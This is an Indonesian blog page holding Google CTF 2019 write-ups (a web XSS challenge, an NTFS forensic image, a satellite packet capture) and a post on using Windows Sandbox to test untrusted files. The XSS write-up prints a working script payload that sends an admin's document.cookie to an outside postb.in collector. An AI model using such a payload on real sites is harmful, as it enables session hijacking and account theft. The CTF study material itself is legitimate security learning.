No More Yukinoshita 47. I'm Done

If You Found Every Social Media Platform Using "Yukinoshita 47" Name That's The Other Guy.

Copyright © Yukinoshita 47 | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

My Motivation

My Motivation



Seal

Always Trust Yourself And Use Your Opportunity



Sabtu, 20 Juli 2019

Google CTF 2019 : Government Agriculture Network [Write Up]


Hallo gayn kembali lagi dengan gw Yukinoshita 47 yapp lanjutkan bermain Google CTF 2019 kali ini challenge nya Government Agriculture Network dengan kategori web berikut challenge nya.


langsung aja gw buka https://govagriculture.web.ctfcompetition.com dan diweb nya terdapat form posting konten


 kemudian gw post asal asalan muncul lah seperti ini ya konfirmasi web nya itu ya post nya masuk dan nunggu admin untuk lihat post nya



kemudian gw buka postbin untuk membuat payload XSS nya karena disini gw mau inject payload XSS grab cookie admin web nya.


setelah itu gw membuat payload yang didapat url nya dari postbin
kemudian gw inject dengan kode payload <script>location.href="https://postb.in/1565680049167-8349444575142?cookie='+document.cookie;"</script>  kemudian klik Submit



dan respons dari web nya adalah seperti ini nah sesuai dugaan gw web nya vuln XSS dan payload XSS grab cookie nya bekerja dengan baik wkwkwkwkwk.


 dan flag nya adalah CTF{8aaa2f34b392b415601804c2f5f0f24e}


dan tentu saja solved wkwkwkwk/


Jumat, 19 Juli 2019

Google CTF 2019 : Home Computer [Write Up]


Hallo gayn kembalo lagi dengan gw Yukinoshita 47 kali ini gw mau share write up Google CTF  2019 ya kali ini challenge nya Home Computer berikut challenge nya,


Gw download aja langsung file
 86863db246859897dda6ba3a4f5801de9109d63c9b6b69810ec4182bf44c9b75


langsung masuk ke folder download dengan perintah

~# cd Downloads

kemudian tekan enter


ubah nama 86863db246859897dda6ba3a4f5801de9109d63c9b6b69810ec4182bf44c9b75 
menjadi home.zip dengan perintah

~# mv 86863db246859897dda6ba3a4f5801de9109d63c9b6b69810ec4182bf44c9b75 home.zip

kemudian tekan enter  


unzip file home tadi dengan perintah

~# unzip home.zip

kemudian tekan enter


dan gw cek file note.txt dengan perintah

~# cat note.txt

kemudian tekan enter disini gw liat ada petunjuk seperti nya ini file image dari partisi harddisk karena dalam prosedur forensic sebelum dianalisa ya harddisknya harus dibuat dalam bentuk image dulu biar kalo ada kesalahan bukti forensik nya tidak rusak wkwkwk.


langsung aja gw buat folder home dengan perintah

~# mkdir home

kemudian tekan enter

lalu gw mount dengan perintah

~# mount -o loop family.ntfs home/

lalu tekan enter



 masuk ke folder home tadi dengan perintah

~# cd home

kemudian enter

dan lihat isi folder nya dengan perintah

~# ls

kemudian tekan enter 

maka akan kelihatan isi partisi image harddisk tadi


gw coba masuk ke my Documents nya

dengan perintah

~# cd Users/Family/Documents/

kemudian tekan enter


karena instruksi nya cari credentials gw menggunakan perintah getfattr untuk mencari file yg disembunyikan lalu di convert ke file .png dengan perintah nya

~# getfattr --only-values credentialx.txt > image.png

lalu tekan enter


lihat files nya dengan eog jika eog lu belum terinstall install dengan perintah

~# apt install eog

kemudian tekan enter

lalu jika sudah ada eog lu tinggal cek aja

~# eog image.png

kemudian tekan enter

dan muncul deh flag nya


flag ny adalah CTF{congratsyoufoundmycreds}


dan solved wkwkwkwkwkw/




Windows Sandbox Solusi Buat Langkah Awal Untuk Mencegah Insiden Siber


Halo gayn kembali lagi dengan gw Yukinoshita 47 ya kali ini gw mau bahas Windows Sandbox Solusi Buat Langkah Awal UntukW Mencegah Insiden Siber ya buat user Windows kayak gw dan elu mungkin ya sudah pasti kita sama2 berjuang melindungi Windows kesayangan kita dari serangan malware.

Kebanyakan terjadinya infeksi malware karena kelalaian User itu sendiri seperti mengklik sembarang file dari email spam, install software crack, dan banyak lagi salah satu solusi dari masalah ini ya Sandbox lah kwkwkwkwkk.


Apa itu Sandbox ?

Ya Sandbox itu tempat main bocah di taman karena guna nya sandbox ini adalah untuk mengontrol bocah tersebut agar tidak kemana-kemana karena tanpa sanbox bisa saja ia merusak taman tersebut wkwkwkwkwk.



Oke mari kita bahas dulu definisi dari Sandbox itu sendiri

Dalam keamanan komputer, sandbox adalah mekanisme keamanan untuk memisahkan program yang sedang berjalan. Istilah ini acap digunakan untuk mengeksekusi kode yang belum diuji, atau program tidak tepercaya yang berasal dari pihak ketiga dan pemasok yang tidak terverifikasi, serta pengguna dan situs web yang tidak tepercaya.

Sandbox biasanya menyediakan sumber daya yang dikontrol ketat bagi program tamu untuk berjalan pada komputer, misalnya menyediakan ruang gerut pada cakram dan memori. Akses jaringan, kemampuan untuk memeriksa sistem penyedia atau membaca dari perangkat masukan biasanya tidak diizinkan atau sangat dibatasi. Dalam kasus ini, sandbox adalah contoh spesifik dari virtualisasi.

Teknologi sandbox seringkali digunakan untuk menguji program tidak terverifikasi yang mungkin mengandung malware atau kode jahat lainnya, tanpa harus membiarkan perangkat lunak membahayakan perangkat penyedia.

Berikut ini conoth pengujian Malware di Device tanpa sanbox dan Device dengan Sanbox.


Oke kita mulai yuk proses nya

Apa aja syarat mutlak untuk Sandbox di Windows ini ? 

Spesifikasi dasar
  1. Windows 10 Pro atau Enterprise versi terbaru kalo lu merasa belum update Windows 10 nya ya kalo bisa lu update dulu dah ke versi terbaru.
  2. Hardware virtualization.
  3. 64 bit architecture.
  4. Processor Minimal 2 Core
  5. 4GB of RAM (8GB direkomendasikan).
  6. 1GB of HDD space (SSD direkomendasikan).

Cara cek apakah Device kita bisa diinstall Windows Sandbox atau tidak nya adalah

Buka Command Prompt via menu start caranya adalah
Start >> Windows System >> Command Prompt

Kemudian input perintah

systeminfo.exe

Kemudian tekan enter jika Hyper-V Requirement nya semua nya Yes berarti Device kalian support untuk Install Windows Sandbox


Kemudian search Turn Windows features on or off kemudian klik.


Setelah itu checklist Windows Sandbox kemudian klik ok.


Biarkan proses instalasi berjalan hinga selesai



Setelah instalasi selesai ya Restart dengan cara klik Restart now


Bagaimana cara menggunakan windows sandbox ?

Pertama buka Menu Start pilih Windows Sandbox


Dan kemudian Windows Sandbox pun muncul seperti ini lah tampilan nya ya betul seperti virtual Machine ya memang Sandbox ini juga bagian dari komputer virtual seperti Vmware dan Virtualbox beda nya Sandbox sifat nya temporer dan akan hilang semua data nya setelah di close Sandbox nya ya bisa bilang mirip Deepfreeze lah metode kemanan nya.


Oke gw contohin ya disini gw Download program aplikasi gratis dari internet

Gw Copy File nya


Kemudian gw paste kan di dalam Desktop Sandbox nya


Tunggu aja proses copy data nya hingga selesai


Kemudian klik file nya dan gw buka dan install aja dah sambil memastikan apakah ini program aplikasi ada malware nya kah, atau adware nya atau mungkin bloatware ? itu sebab nya perlu diuji dulu di Windows Sandbox.


Selesai install


Gw coba jalanin program aplikasi nya wkwkwkwkkw ya sama seperti Windows pada umum nya kan beda nya ini di karantina dalam virtualisasi Sandbox jadi kalo pun ada Malware dan kawan-kawan nya paling cuma berfungsi di lingkungan Sandbox nya doang gak ngaruh di Sistem OS di Device lu wkwkwkwkwk.


Jika gw Close ya lu liat sendiri kan warning nya setelah di close Windows Sandbox nya otomatis semua data yang ada di Sandbox bakal hilang secara permanen.


Nah cukup mudah kan ya semoga membantu lah jika lu nerima file lampiran dari email dan lu ragu buat buka lampiran nya ya lu bisa kok buka nya di sandbox aja jika ada malware nya ya lu selamat dari insiden yang tak diinginkan wkwkwkwkwk.

Oke cukup sampai disini penjelasan singkat gw sekian dan terimakasih.

Kamis, 18 Juli 2019

Google CTF 2019 : Satellite [Write Up]


Hallo Gayn lanjut kembali lagi dengan gw Yukinoshita47 kali ini gw mau lanjutin sharing write up Google CTF 2019 challenge nya adalah Satellite kategori nya adalah networking.

Berikut Challenge nya :

Satellite

Placing your ship in range of the Osmiums, you begin to receive signals. Hoping that you are not detected, because it's too late now, you figure that it may be worth finding out what these signals mean and what information might be "borrowed" from them. Can you hear me Captain Tim? Floating in your tin can there? Your tin can has a wire to ground control? Find something to do that isn't staring at the Blue Planet.



download file nya


langsung buka terminal perintah nya adalah

masuk ke root

~$ sudo su

kemudian tekan enter dan input password nya

masuk ke folder download

~# cd Downloads

kemudian tekan enter


pertama gw cek strings file nya kali aja ada flag yang nyangkut wkwkwk

~# strings 768be4f10429f613eb27fa3e3937fe21c7581bdca97d6909e070ab6f7dbf2fbf

kemudian tekan enter dan hasil nya gajelas wkwkwkwk


kemudian gw extract dengan binwalk perintah nya adalah

~# binwalk -e 768be4f10429f613eb27fa3e3937fe21c7581bdca97d6909e070ab6f7dbf2fbf

kemudian tekan enter dan hasil nya terdapat file README.pdf dan init_sat


 Gw buka file readme terdapat kalimat

On your way down to earth you almost collided with that communications satellite. Stepping out to inspect, you find some space junk labeled “init_sat”. It looks like humans run it to set up satellites. Is the communication with the satellite really as secure as those humans always claim? Could this help you read the space-static to learn more about earth creatures, and whether to join the party down there? You load init_sat on your terminal.
dan gambar dengan tulisan Osmium dan init_sat
 

kemudian gw beri hak akses ke file init_sat dengan perintah

~# chmod 777 *

kemudian tekan enter

dan gw jalanin file init_sat dengan perintah

~# ./init_sat

kemudian gw input osmium lalu gw tekan a hasil nya muncul seperti ini output nya

Username: brewtoot password: ********************    166.00 IS-19 2019/05/09 00:00:00    Swath 640km    Revisit capacity twice daily, anywhere Resolution panchromatic: 30cm multispectral: 1.2m    Daily acquisition capacity: 220,000km²    Remaining config data written to: https://docs.google.com/document/d/14eYPluD_pi3824GAFanS29tWdTcKxP_XUxx7e303-3E


gw buka url  
dan hasil nya terdapat base 64 encode  yaitu seperti ini  : VXNlcm5hbWU6IHdpcmVzaGFyay1yb2NrcwpQYXNzd29yZDogc3RhcnQtc25pZmZpbmchCg==


gw decode dengan perintah

~# echo "VXNlcm5hbWU6IHdpcmVzaGFyay1yb2NrcwpQYXNzd29yZDogc3RhcnQtc25pZmZpbmchCg==" | base64 -d

dan hasilnya

Username: wireshark-rocks
Password: start-sniffing!



itu artinya gw dapat clue untuk sniffing dengan wireshark gw jalanin wireshark


gw jalanin ulang program init_sat nya seperti di gambar dibawah ini


dan packet transfer data yang berisi flag pun ter capture oleh wireshark 

0000   74 c6 3b ef d2 2f f8 6e ee 94 18 d0 08 00 45 00   tÆ;ïÒ/ønî..Ð..E.
0010   01 9f 70 59 40 00 31 06 2b e9 22 4c 65 1d c0 a8   ..pY@.1.+é"Le.À¨
0020   64 05 05 39 a9 88 91 a9 d8 b2 47 a6 ff ba 80 18   d..9©..©Ø²G¦ÿº..
0030   00 dc ec 90 00 00 01 01 08 0a 6e 3a 8d f3 ec 45   .Üì.......n:.óìE
0040   09 de 55 73 65 72 6e 61 6d 65 3a 20 62 72 65 77   .ÞUsername: brew
0050   74 6f 6f 74 20 70 61 73 73 77 6f 72 64 3a 20 43   toot password: C
0060   54 46 7b 34 65 66 63 63 37 32 30 39 30 61 66 32   TF{4efcc72090af2
0070   38 66 64 33 33 61 32 31 31 38 39 38 35 35 34 31   8fd33a2118985541
0080   66 39 32 65 37 39 33 34 37 37 66 7d 09 31 36 36   f92e793477f}.166
0090   2e 30 30 20 49 53 2d 31 39 20 32 30 31 39 2f 30   .00 IS-19 2019/0
00a0   35 2f 30 39 20 30 30 3a 30 30 3a 30 30 09 53 77   5/09 00:00:00.Sw
00b0   61 74 68 20 36 34 30 6b 6d 09 52 65 76 69 73 69   ath 640km.Revisi
00c0   74 20 63 61 70 61 63 69 74 79 20 74 77 69 63 65   t capacity twice
00d0   20 64 61 69 6c 79 2c 20 61 6e 79 77 68 65 72 65    daily, anywhere
00e0   20 52 65 73 6f 6c 75 74 69 6f 6e 20 70 61 6e 63    Resolution panc
00f0   68 72 6f 6d 61 74 69 63 3a 20 33 30 63 6d 20 6d   hromatic: 30cm m
0100   75 6c 74 69 73 70 65 63 74 72 61 6c 3a 20 31 2e   ultispectral: 1.
0110   32 6d 09 44 61 69 6c 79 20 61 63 71 75 69 73 69   2m.Daily acquisi
0120   74 69 6f 6e 20 63 61 70 61 63 69 74 79 3a 20 32   tion capacity: 2
0130   32 30 2c 30 30 30 6b 6d c2 b2 09 52 65 6d 61 69   20,000km².Remai
0140   6e 69 6e 67 20 63 6f 6e 66 69 67 20 64 61 74 61   ning config data
0150   20 77 72 69 74 74 65 6e 20 74 6f 3a 20 68 74 74    written to: htt
0160   70 73 3a 2f 2f 64 6f 63 73 2e 67 6f 6f 67 6c 65   ps://docs.google
0170   2e 63 6f 6d 2f 64 6f 63 75 6d 65 6e 74 2f 64 2f   .com/document/d/
0180   31 34 65 59 50 6c 75 44 5f 70 69 33 38 32 34 47   14eYPluD_pi3824G
0190   41 46 61 6e 53 32 39 74 57 64 54 63 4b 78 50 5f   AFanS29tWdTcKxP_
01a0   58 55 78 78 37 65 33 30 33 2d 33 45 0a            XUxx7e303-3E.


 dan flag nya adalah CTF{4efcc72090af28fd33a2118985541f92e793477f}


wkwkwkwkw dan solved

oke cukup sampai disini aja write up nya sekian dan terimakasih.

kntl